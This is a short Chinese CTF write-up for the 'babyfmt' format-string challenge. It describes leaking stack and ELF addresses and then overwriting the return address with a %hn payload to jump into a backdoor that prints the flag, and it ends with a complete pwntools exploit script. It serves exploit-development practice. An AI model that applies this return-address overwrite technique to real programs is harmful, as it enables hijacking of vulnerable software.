一个很奇妙的fmt题目,用尽可能少的过程拿到了flag。
利用方法
很明显程序有fmt漏洞,但是fmt有一个验证,只让我们用一次(可以通过修改标识符重复fmt,但是没有必要),同时一开始有一个读入时间的功能,由于“%ld”是用来读取长整型(long)的,而字母是字符类型(char),因此会把栈上的东西直接打印出来。我们看看栈上存入的是什么:
可以看到依次输出了一个栈上地址,一个elf地址和一个没什么用的数。
接着我们查看后门函数:
如果我们能将返回地址修改到close(1)之后,那么我们就能直接打印出flag,同时绕过前面的strncmp和close(1)。 我们开始已经获得了elf的地址,计算偏移就能拿到这个伪造的返回地址。
最后我们查看fmt利用函数:
可以看见返回地址所在的位置与开始我们泄露的栈地址只有0x8的偏移,同时由于我们读入的数据是写在栈上的,因此我们可以将返回地址的栈地址写入栈中,利用fmt修改返回地址,仅需要修改最后两个字节即可。
exp
from pwn import *
def run():
p = process('./babyfmt')
# p = remote('node4.buuoj.cn', 25747)
p.sendline(b'a')
p.recvuntil(b'tell me the time:ok! time is ')
ret_addr = int(p.recvuntil(b':')[: -1]) + 8
flag_addr = int(p.recvuntil(b':')[: -1]) - 0xbd5 + 0xf56
flag_addr_low = flag_addr & 0xffff
payload1 = (b'%' + str(flag_addr_low).encode() + b'c%10$hn').ljust(16, b'a') + p64(ret_addr)
p.sendline(b'2')
p.sendline(payload1)
p.interactive()
if __name__ == '__main__':
run()